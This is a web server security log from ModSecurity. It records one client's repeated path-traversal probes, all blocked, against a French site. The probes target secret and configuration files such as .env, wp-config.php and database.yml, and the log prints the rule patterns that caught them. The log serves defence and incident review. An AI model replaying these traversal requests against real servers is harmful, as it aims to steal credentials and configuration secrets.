[Tue May 12 05:10:34.790536 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.246:3336] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/app/etc/env.php"] [unique_id "agKaKno6NvB9WXx5V-6nTwAAARE"]
[Tue May 12 05:10:34.790716 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.246:3336] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/app/etc/env.php"] [unique_id "agKaKno6NvB9WXx5V-6nTwAAARE"]
[Tue May 12 05:10:34.808411 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.246:3336] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/settings.py"] [unique_id "agKaKno6NvB9WXx5V-6nUAAAARE"]
[Tue May 12 05:10:34.808543 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.246:3336] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/settings.py"] [unique_id "agKaKno6NvB9WXx5V-6nUAAAARE"]
[Tue May 12 05:10:34.808724 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.246:3336] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/settings.py"] [unique_id "agKaKno6NvB9WXx5V-6nUAAAARE"]
[Tue May 12 05:10:34.826198 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.246:3336] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/config/database.yml"] [unique_id "agKaKno6NvB9WXx5V-6nUQAAARE"]
[Tue May 12 05:10:34.826326 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.246:3336] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/config/database.yml"] [unique_id "agKaKno6NvB9WXx5V-6nUQAAARE"]
[Tue May 12 05:10:34.826506 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.246:3336] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/config/database.yml"] [unique_id "agKaKno6NvB9WXx5V-6nUQAAARE"]
[Tue May 12 05:10:34.844188 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.246:3336] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKno6NvB9WXx5V-6nUgAAARE"]
[Tue May 12 05:10:34.844252 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.246:3336] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKno6NvB9WXx5V-6nUgAAARE"]
[Tue May 12 05:10:34.844352 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.246:3336] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKno6NvB9WXx5V-6nUgAAARE"]
[Tue May 12 05:10:34.844533 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.246:3336] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKno6NvB9WXx5V-6nUgAAARE"]
[Tue May 12 05:10:34.862009 2026] [core:error] [pid 1730175:tid 1730194] [client 45.148.10.246:3336] AH10244: invalid URI path (/images../../../.env)
[Tue May 12 05:10:35.579604 2026] [core:error] [pid 1730207:tid 1730228] [client 45.148.10.246:3344] AH10244: invalid URI path (/images../../../../.env)
[Tue May 12 05:10:36.753964 2026] [security2:error] [pid 1820198:tid 1820209] [client 45.148.10.246:3350] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaLM1tk6y7yBJLpJozQAAAAIk"]
[Tue May 12 05:10:36.754086 2026] [security2:error] [pid 1820198:tid 1820209] [client 45.148.10.246:3350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaLM1tk6y7yBJLpJozQAAAAIk"]
[Tue May 12 05:10:36.754277 2026] [security2:error] [pid 1820198:tid 1820209] [client 45.148.10.246:3350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaLM1tk6y7yBJLpJozQAAAAIk"]
[Tue May 12 05:10:36.754588 2026] [security2:error] [pid 1820198:tid 1820209] [client 45.148.10.246:3350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaLM1tk6y7yBJLpJozQAAAAIk"]
[Tue May 12 05:10:36.771851 2026] [security2:error] [pid 1820198:tid 1820209] [client 45.148.10.246:3350] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaLM1tk6y7yBJLpJozQQAAAIk"]
[Tue May 12 05:10:36.771938 2026] [security2:error] [pid 1820198:tid 1820209] [client 45.148.10.246:3350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaLM1tk6y7yBJLpJozQQAAAIk"]
[Tue May 12 05:10:36.772057 2026] [security2:error] [pid 1820198:tid 1820209] [client 45.148.10.246:3350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaLM1tk6y7yBJLpJozQQAAAIk"]
[Tue May 12 05:10:36.772314 2026] [security2:error] [pid 1820198:tid 1820209] [client 45.148.10.246:3350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaLM1tk6y7yBJLpJozQQAAAIk"]
[Tue May 12 05:10:36.789792 2026] [security2:error] [pid 1820198:tid 1820209] [client 45.148.10.246:3350] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaLM1tk6y7yBJLpJozQgAAAIk"]
[Tue May 12 05:10:36.789885 2026] [security2:error] [pid 1820198:tid 1820209] [client 45.148.10.246:3350] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaLM1tk6y7yBJLpJozQgAAAIk"]
[Tue May 12 05:10:36.790044 2026] [security2:error] [pid 1820198:tid 1820209] [client 45.148.10.246:3350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaLM1tk6y7yBJLpJozQgAAAIk"]
[Tue May 12 05:10:36.790250 2026] [security2:error] [pid 1820198:tid 1820209] [client 45.148.10.246:3350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaLM1tk6y7yBJLpJozQgAAAIk"]
[Tue May 12 05:10:36.808282 2026] [security2:error] [pid 1820198:tid 1820209] [client 45.148.10.246:3350] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/app/etc/env.php"] [unique_id "agKaLM1tk6y7yBJLpJozQwAAAIk"]
[Tue May 12 05:10:36.808419 2026] [security2:error] [pid 1820198:tid 1820209] [client 45.148.10.246:3350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/app/etc/env.php"] [unique_id "agKaLM1tk6y7yBJLpJozQwAAAIk"]
[Tue May 12 05:10:36.808658 2026] [security2:error] [pid 1820198:tid 1820209] [client 45.148.10.246:3350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/app/etc/env.php"] [unique_id "agKaLM1tk6y7yBJLpJozQwAAAIk"]
[Tue May 12 05:10:36.831438 2026] [security2:error] [pid 1820198:tid 1820209] [client 45.148.10.246:3350] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/settings.py"] [unique_id "agKaLM1tk6y7yBJLpJozRAAAAIk"]
[Tue May 12 05:10:36.831578 2026] [security2:error] [pid 1820198:tid 1820209] [client 45.148.10.246:3350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/settings.py"] [unique_id "agKaLM1tk6y7yBJLpJozRAAAAIk"]
[Tue May 12 05:10:36.831771 2026] [security2:error] [pid 1820198:tid 1820209] [client 45.148.10.246:3350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/settings.py"] [unique_id "agKaLM1tk6y7yBJLpJozRAAAAIk"]
[Tue May 12 05:10:36.849178 2026] [security2:error] [pid 1820198:tid 1820209] [client 45.148.10.246:3350] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/config/database.yml"] [unique_id "agKaLM1tk6y7yBJLpJozRQAAAIk"]
[Tue May 12 05:10:36.849323 2026] [security2:error] [pid 1820198:tid 1820209] [client 45.148.10.246:3350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/config/database.yml"] [unique_id "agKaLM1tk6y7yBJLpJozRQAAAIk"]
[Tue May 12 05:10:36.849511 2026] [security2:error] [pid 1820198:tid 1820209] [client 45.148.10.246:3350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/config/database.yml"] [unique_id "agKaLM1tk6y7yBJLpJozRQAAAIk"]
